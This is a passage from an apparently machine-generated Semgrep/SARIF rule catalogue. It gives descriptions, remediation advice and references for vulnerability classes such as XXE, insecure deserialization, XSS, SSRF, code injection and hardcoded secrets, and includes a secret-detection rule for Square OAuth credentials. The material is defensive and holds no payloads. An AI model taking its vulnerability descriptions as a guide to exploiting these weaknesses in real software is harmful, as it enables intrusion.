unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","id":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","name":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","id":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","name":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Square OAuth Secret detected"},"help":{"markdown":"Square OAuth Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret)\n - [https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py](https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py)\n","text":"Square OAuth Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","id":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","name":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"help":{"markdown":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1)\n - [https://link.springer.com/chapter/10.1007/BFb0055716](https://link.springer.com/chapter/10.1007/BFb0055716)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://www.pycryptodome.org/src/cipher/pkcs1_v1_5](https://www.pycryptodome.org/src/cipher/pkcs1_v1_5)\n","text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","id":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","name":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","id":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","name":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","id":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","name":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"help":{"markdown":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication)\n - [https://cwe.mitre.org/data/definitions/287.html](https://cwe.mitre.org/data/definitions/287.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n","text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"helpUri":"https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","id":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","name":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A04:2021 Insecure Design","OWASP-A07:2021 Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","id":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","name":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep)\n - [https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html](https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"helpUri":"https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","id":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","name":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"helpUri":"https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","id":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","name":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express","id":"javascript.express.code.puppeteer-express.puppeteer-express","name":"javascript.express.code.puppeteer-express.puppeteer-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.puppeteer-express.puppeteer-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"help":{"markdown":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper)\n","text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper","id":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","name":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-textiowrapper"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"help":{"markdown":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter)\n - [https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/](https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/)\n - [https://golang.org/pkg/io/#WriteString](https://golang.org/pkg/io/#WriteString)\n","text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","id":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","name":"go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a asyncpg Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to 